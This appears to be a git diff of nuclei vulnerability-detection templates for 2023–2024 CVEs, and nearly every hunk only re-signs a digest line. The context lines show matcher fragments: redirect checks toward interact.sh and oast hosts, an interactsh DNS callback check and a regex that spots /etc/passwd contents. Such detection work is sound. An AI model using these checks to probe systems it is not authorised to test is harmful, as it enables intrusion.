4b0a00483046022100ce08a03a6aa1582532acf62f661ce5ce40afe812793118799951d4ae125d469c022100cf3856bae89445b456a8d94318817eaae079b9ab399cea89ff899639ac47e1c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fd1abaa8be5bfa95d08a60c070bba83152dd6af7bb3f970cad559258a3845fe022100b62ff3a35f50dfcc31b2020bcf504f427420cd73bf22530a4ce7220886732cf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index dda60f5ff6..ec77eb4885 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e05cf7f2f91cf532ffb6f807d60642917e9e6ec9d822a2e54cd2de74ae45ce3022034c3befcd7ef45e90974eca3405e19fa64eb34794b94d3229602d8f3c80e20b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b23434311046f2118a934456d41f8450e59e2e9e10d33826f69c38176088f17c022100f3116a2cea078ef92a687c66f3793852f830e397529696f42679d997ebb2f150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index 3168955dcc..be21d7fc93 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100f8f67cf5ced5325f71a7df26c1365c6ef6de0e5bff9fb8bc27c5772ec9678ccb02202cc859db371c7dfd3a38c6266aeec5b8460678e5a0bc08479f333dca7163c770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b943bbe6c73534d987ec49f62c76b633e33127ed6ab070aa135200711e589190220115baad7107124c54b437c7ff876f7bff53f62665352146dfdd9bfeb6bae15da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6389.yaml b/http/cves/2023/CVE-2023-6389.yaml index cb6c3089dd..e5cd4a0c6d 100644 --- a/http/cves/2023/CVE-2023-6389.yaml +++ b/http/cves/2023/CVE-2023-6389.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 490a00463044022069291b94181425caa4ab6312081887206d9106911c86385cb93dacc297d0b7fb022078696dd4ed775e8b5a8d9e5e93907812fd5645362152da68ae7aa6bcd89bf8a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c02ded482859448a1bda812ee6638f116a12421d8fc431859d42761ca5c38dd3022015c86130724ca43cce6b7cd93aeea90fa3d03cc9a0cd16569cb4603bdfb530b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6553.yaml b/http/cves/2023/CVE-2023-6553.yaml index 33ebd2b226..bdfb532fc4 100644 --- a/http/cves/2023/CVE-2023-6553.yaml +++ b/http/cves/2023/CVE-2023-6553.yaml @@ -57,4 +57,4 @@ http: - 'status_code == 200' - '!contains(body, "Incorrect parameters")' condition: and -# digest: 490a004630440220661c2d0bbd520881687d882ec68392a1b4550061945919523c2edcd6422ed8a702203bdd67f2fe7b6bca62f3608e55342cd081f8ac2dc9d4a54ceb5d82b40d267e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022046570b0b4e58d3527a4c3be37e4e041ff3d731e2af4b42eb4066bd36bad48675022031023b285a24e0cc53f113f29c661a3ae15229879be46347a6cf87b0ee2eecf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index 34c09512b2..b4b169302e 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -44,4 +44,4 @@ http: - 'contains_all(header, "lp_session_guest=", "application/json")' - 'contains_all(body, "status\":\"success", "No courses were found")' condition: and -# digest: 490a00463044022049bde3d0466108b9b6bedde41f7b02672e5105dc2715b1e47e00050d940308960220202e7919355ec36aa5f1df03661c9e36bfd63b962ba0df1e1f749ae5b6e5bdea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b53e35f7ae7569acb1bda7d05de5b75012a7ea5d1eb74c3111f8dc5eeca6efb3022020b1e830c63e9643fa36e745f1a77cf067f43f4fda85cc07997cfe278d0d470e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index 2e87ba92ce..6ddb116015 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -46,4 +46,4 @@ http: - "regex('root:.*:0:0:', body_1)" - 'contains(body_2, "Essential Blocks – Page")' condition: and -# digest: 490a00463044022074608b993f54ad1c4a650efb6e94f7060a6eb7bbcb1b6a06d126af9f727eece302203c483f813b2de38dde9f6f4de6ae15eaaa6e18e056c051c0db9822342f974444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220025cd53c7a663651d839f0ad35424da7534ea7cb30906de15667d74376584959022100ed9e6c7a470d28ace1ff2616b51480283f4e46af81bb8fc5e46dbd7a2dc723de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6634.yaml b/http/cves/2023/CVE-2023-6634.yaml index fb238e4d42..06a1916b28 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -60,4 +60,4 @@ http: - "contains(body_1, '<pre>{{randstr}}</pre>') " - "status_code == 200" condition: and -# digest: 4a0a00473045022100fefee7738d7318b2a23319053598eb449feae8f7895068cc68e9024beb9349000220243e0e60f28515bca8e3f6574da036d920079e1edb28c9d922532c4ffe2dec33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026689095008d97443714c14e2be78edc8e3db1d76582dfbe7bc7788df0e65d8b0221008483dfaf8c8aa92d86274a31ded2fb48fe415afa35a9da3cbbbf8a1aee660698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index 05daacb7c8..0305cfaf4c 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502206ddb723e7f69860d46bf9f0d3eb35ef2480886f01c5ca13e1a0d8575549d5120022100bd216b56f72cce7e547ed8ebf3dcbd2e3ec8ae994eccca17465f3315741f4e29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021fbebaa88ab1755114b7966a9f7a1cea58912f8b304515cab004679a5691d3e02200b73631111984f9659dd5aafeb2ceabf1b746bbd81eae1bda187053ddfc48da1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index 5af162471b..c109fc26d9 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -66,4 +66,4 @@ http: - 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")' - 'contains_all(body_3, "true,\"data\":", "access_token=")' condition: and -# digest: 490a00463044022054ee2def0b29dd215b74e42c2b2fae960ec0297d5d2e8218b287ca21b198810802200d71bf6828498c33e1b0e6e7dfd452c17b144bffdb1857b383b8a82ff70521b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084ea25bc632778a481dd0545166e1484a4a3d1a752ada7e2a783adc2c7be5495022100dc5775f2bbc435230438bf01cbe56acfe2ed80489b51dfce16a6e14111069e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index 646cc1ac80..9135a458f4 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -98,4 +98,4 @@ http: json: - '.run.info.run_id' internal: true -# digest: 490a00463044022052a30b6e907e294f038966261bdad72af7c17267badac02e788613b04753c2b1022066fc365a76fb0d47be05eaa43ae50f697ff46da97e01b7164ee6a67634a8f687:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db5504fc5ccec8cb533fd47b571ed5f305ea8139bb810af6027e28961ced040f02206640d8721c739138031e655a2f394b7ceda41c462823e52e45cf0ba23b260200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index cdb0670438..6d226b50d1 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f0cc21ee7674483fa248cd37db375771b19a1d3946c54b714fe83507f3165b8d02200428fde4d64af3695a299151160bf01a3519aca37aef9bf090b6e554b0ae1bb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008702f8bb7a5c93868381e03fb38369b7d7a15d2001f06633b74279f1e482280b02210093a5a577ec94663ec705c50930361777c323c8252a7ae768227ee4a78542491b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index 53ce0b1af0..09b7e8fc97 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210093c24d2fd1ae8419c9e8f9fd7a52f96cdd206a4cb9b12d3609925dc966ccccef022100e0ab5dea2fb436d6b86f9d3ab834a6191b1420a549be6df84c7658dde0c24928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a17df05a5919ecaed61f2ff2fa97b35c5837b3faeacc17c8fa58e1a36117922022100d5bd45067c0fcd14a7bf2caeb7d39376091b6ae3cc5da4216d635e3fb53d0cc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 57b2e30ef2..7b9d652156 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -76,4 +76,4 @@ http: - type: dsl dsl: - username -# digest: 4a0a0047304502203c8b9f3dd68d958f6e7fef77b3e41a0503d0ce5dbd5938e48b6aa5673740deb6022100a73edc9d9b3abab28c28d668940b630a29f8ab22eb57fc837c0a199d11949d37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe706da29f53fa0b108713ef9f95c38b54a7481e7a91e1935b4a61b053972c320220348984153c3fabb194fc8d66770c796b3a32a7ebfd8f0a20d8eaf3b529aa2c84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 4629219165..0a6d987908 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -57,4 +57,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a004730450220224fd0c2d3e7a5a8a342a552978cab6e0c092e96e5051acbcbc188195ddbaf79022100e343e64a1df88675ddee620ae422551478db8fb0bd0717f599875461b3674f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220441ad46885b455c236ce16bd52020d0f8f142b8b3c28f5eb9f4f2a683821342702207de3c7d603b1b1da12b5752330c2112c6411c15c8eaed0f87150be2c41d2959c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index bd4b85c563..50bf2b71da 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -143,4 +143,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 490a0046304402202af9825ce4c628dd737cd0ccc55a5e21eacfe2fe5bfd7774cd9beb496823ff1902200709cad5ee85816fd669fb420ec1ad81f9fc45674917637775df828d1d3c24c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b55f6b1a271d5853e4388a493b7db6672febea3697dcd0649fbaf6c2538dcefc02201397c08ed2ecd60f4aac71bcf61b1f0b7e66f84146464a70ec4d9f7584e5725b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index f7d878effb..5a9a044b2b 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cb7b55a7105c762dc0cfc768f943c35b9f8e8dd12e835bdf1d02a7dad92f19ce022100f3f3f81a40d97c815e7fd00dbf28682b4b29f358abbc6ef73a1cd30ae198a26a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aad72bb1daab1487638c2abf02e13adfb741ae7eed198c48c07e7f95c1968d06022072f7c69ebf26c71a1544dfc0d7e99b6051fc40e09615eb30904343822615b1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 98bef039f1..4b3327d0f2 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203776f70607308dc5842148f721807cddd437743f37d42520d8d3d7507ccb14fe0221008718d14a88f39edcfc1dc90a1b399da2330eb4d026aba06ae521a1be3ef07338:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index 239fd5cf77..626be7df96 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d1f25d83c4cc8faf1fb67b3d457d7836d489e5d39a804474ab40d527613a1cf402206d8825a981c77b5dbd4b1e8b46aa5223cdc770f4699c9593bf2abfae8875d691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3517deada4eccc530d06c496e5b8ab77011dd1ddb4d64a739531eba5da26af10221009e090cf57b6a36adeecf56bf92acce8a05cbd6443a90c85275376bb86d31fa1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index de4cc34394..e001581a54 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -67,4 +67,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207865526b425259e07024fac870f35786a61a851cc80adc31f50af1315dbb70f5022077b7fcab0b340df120fd03a87976f7c79ae545de9b114bbeb89ac0d7fa77b5d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016af05f7a274fef62184fc086ebac0841514101430fce427e95e9aa15c223517022100dd87df7dd84e55a5e3b39b9de16d58346c0e5a6560d565e40269582e738044f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index bf2d604f9e..a0049c469b 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -46,4 +46,4 @@ http: - '!contains(body_1, "<h1> Interactsh Server </h1>")' - 'status_code_2 == 200' condition: and -# digest: 4b0a00483046022100c8dcb630e55d93d987c9a3762240cb9645bcf34d01a16d7956fac27f0305b495022100b735b765090843b97037acb05a7df7d8fd2c276a622fba517fe63c67d3104f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ecd416627d1c6165d69bef643a983b65fafaabe6417bb79944e15af02b39b03f022100a5ed6b41e0bf5736e99ed54d1c1a53abe9956c3b773c3cf65c24507b7d2087eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index aaf869114c..370ab6089f 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "created_at", "video_id")' condition: and -# digest: 4a0a00473045022070156cf1af14d1844f0ca97c8ef395673a56630b05af2016c799cacc75015e6f022100961eeec2ecda1a713e896c60ec730e503954339759b3f64aacd2702e074bd745:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022067b13f93f5ef066473b8b51c46c6a613f73ddfbe77905aadaf2241b6d9c09263022100ba7baef034c81bce2b183e7abbdbec4b6dd0044f5aecba3a2bce8f4a0bc32481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 99573cf8f1..9af7e23d84 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -61,4 +61,4 @@ http: regex: - '"nonce":"([0-9a-z]+)"' internal: true -# digest: 4a0a00473045022100d2df4a7cad579bad009987ee9d6530c566d41945f49f28209893750e5911d455022067f89316e7566747df1c9f3ace0ac1a3ff52891d51379e57cc750c506ad754ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204dce0d46e23a96c4332c7141fb7eebb00ac6384853aaf8343276fe89d847988a022015a2c24b11feaf9425e5dd850e00a5ccff4ee8901419f9226029090d885ac9b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index d6a169dc89..ddaf958baa 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -33,4 +33,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header -# digest: 4a0a004730450221008fa9c24b03fedb13e37837ad2730bc20d6d973ad45a2d74dd82193fb651172c5022057ad36fe5c2c8f0f555f7106c808470d5cfc40e96a168c822c4cc96f1183df15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f8114233dc93d6f7f8756ef02b1f03954696a215009b10c4052a06421fe4250022100e565921ef3de19b35c2af7550b0d98f911333848805b11ad398ff151d6e4ce17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index c02512df21..fe0ba91a62 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009ad10d599ee3e30855b6762e19b28a2ac7da9bc0c7706434f624700a515dfba5022100afa860c027433f125b3f43f5789fa421b42e30da5ae52855f7a826f598ce5e98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100987c15b27dca0530370ddf701a23f7f9362d6ddefcc580e0b28aed2094875cbf022100a857d2efb505bae57670716f993ac50f4465f68593f007ab0ce7cb065a07565f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index 11a9799da0..748a780ea5 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ae0b7aaa5c2cc54e8f7f4f2d00c4fb4bde976c89042d6175ec87fd9ef4a99ed022065ef648949d50b42a6621c029c88b279dc5f56f8ff5358185bab08a0937cb7e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210088e37caea857081cdc0057cdd2571508327fa1fb7a077b2fb291421d2b3834b2022100d6040318aa37a2a7932b4cd6e6f83c853e77396dfa54c73d867ef92c039e72ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index 78d1d486cb..0d0feb0582 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203c9fc29ea41909ec2bef545f7a4e29b165e9e11f14bade221b2ffc058c2c9051022100e36e3225d79c6a7ba704b8766c5603e5b2822e539c707a4f2a1a17052f2dfc47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8cb14bf9520061060c46e11d3791ffe34692d43161a7f26c48b42ee00ee9825022100956f14600e498f116c051bbb9247841a554650ce88f40b6142f4f16f0bc7deeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index 254e9129a9..0dde8cca52 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -63,4 +63,4 @@ http: part: header kval: - Server -# digest: 490a0046304402200d59499217f5fa1b23e2853d0fbf6bf7ec8cf454bec8e03f9b282ba0454666c90220022fd485c85c7ae0d7d2c1d61f0137ac708e64e7088329ddd5ee7b09f2914326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfab58b6db75722dda3352ea196c86075bdddc52baef061222e5e92ce305611002202d979aeba25d39e47d69411d8ccd3ce5cd62a9fbdd84f614c4092ae750d64658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index ea8a52ae6b..09b0403216 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dbc462e6a4ec19c1e7ab2f6b6429fe16b06358c3fa73863c3e32131a6e13412e022100e7b446c295e5f3dbb670aff61f094db8306984f320e18dc9ddbf51a996c61905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c36c417506bb3f8110e97a42eed93e6ac5da4f99f506c1998f60c08991af5ffd0220646ccab7ed81816c53a24a7e224f85480706d10c52a4c14fa1a8973115a5d900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index db0f57cbf4..2d16e73726 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220216ceedbf4e4d3fc297fe0289353b2e737908320f01c52ee6744165ec80d0a250220380aec9a972d971780f7b55d7c2aedc82995efa4ff37219641782625ac06a453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f29eb6f5173374ac2b8c49e46593b07e1aedca557c094c6eb845239d5c104f2902205331b2652cb0041d7d04876cf28d36c1ccfbabfb52900d5028595c101bac256e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 52b9c55411..98f36fa39e 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -69,4 +69,4 @@ http: - contains(interactsh_protocol, 'dns') - contains(body_3, "confluence") condition: and -# digest: 4a0a00473045022100d80092d262e68d1570c5fc81be4a315e236f16b2dbdf9a391d7b75c0d2fb7d170220293a0a26dcaa902e80096361b702205e20ec2bf87f23dd7ee911fb1ba767a77c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c28962a7e265cc6de6b2f4ff178c62e7cf092b4f48154a8007dbd880ce7ebb64022100c14be3544d81d99ae0f2196c504637e743b2148ad6f655ef7c311cbb8f7419a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index a99d6d3e8e..6674db6ce8 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -57,4 +57,4 @@ http: - '"result":' - '"message":' condition: and -# digest: 4b0a00483046022100a2d7a9784797d3dc50639c2b76b4d29f645b1157608bb1816a0a6602cba6f380022100ee0ba2172fa6cc5ae3c7c1ebc35e92d4d9fed793450426258df98bb059c1025f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203589440c84513b0f0c1875e09acffb10daecff9b623ee109bc5457ffa0e5e6c4022100a6ce341b46f5eb47bff2eac39e50912943c63bf39f263790afc5c862480d10a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 2e2ce56459..4e590f1f82 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -55,4 +55,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 490a00463044022027b9e6e74722d01d9812d29c2aeda9f8d8e2891891bacef19090cf225e7b43bd0220558c9cd77e216c8f6655742290f05d256049d8a020e84039644f22f3a4aa6601:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b3695799a584f98633838b13b9769a5687d13aba92c44ba67b17b354c0190ff6022100b4876a07281da0b8a36e78aa6db223ed105709ec81082577e5c847371ec324c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 001df73625..5004b0bc4c 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -52,4 +52,4 @@ http: - '/dana-na/' - 'WriteCSS' condition: and -# digest: 4a0a00473045022100e0979daa200c98a79c4fce03c2de552e7e6b4dd8f9e8eeef99953fb2798f99df022016380198586e765e34ecc925177589ab2aff90201a5f02bdff0ce745fb81ee5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064dfea002db32f325d2a6eb8b2611463d76db7ac1f5dfd008ad98fc469f8af9102202351431f37385f4819eda1fc126a5f723e1c525b7a99a88c5628f5f0a53e45a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index 04aba3e984..1fe460df4c 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -41,4 +41,4 @@ http: - 'contains(body, "patchLevel\":")' - 'status_code == 200' condition: and -# digest: 490a0046304402206863aa5b7da352d26b89fcd6e35a46e44dfa7f91bb2ca228c4a923e133eabd3d022073888ea7ac5cf67513056508ed63ce310cb36d3c9501172574f0ce4dd389e9dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8191ca66f6400061c6b59b356a53ce3b95da2f03775b47440ed93a01753a41c022100c889c9b69b82421a875219849c974134fc1444ae169eb208b85fa7100c78dff2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22320.yaml b/http/cves/2024/CVE-2024-22320.yaml index 4240eeec50..8847e95057 100644 --- a/http/cves/2024/CVE-2024-22320.yaml +++ b/http/cves/2024/CVE-2024-22320.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100bb5445a0a7a75731a60c4f541edc93846d4b21a800881005eb87588c9efe49a5022100c19eb39aff09e8bb429bb5c62816d7c8c8f6aff8bf92d80e455c4e9d0591e021:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e4a4d30e6df6808d0ce17438a6f11b8c61b769082b39c9bacf8f08ef85f53a402201b25e55f56c429758e34758316d597f7c019ee6fbec6b0b8e127886e429fd275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-22927.yaml 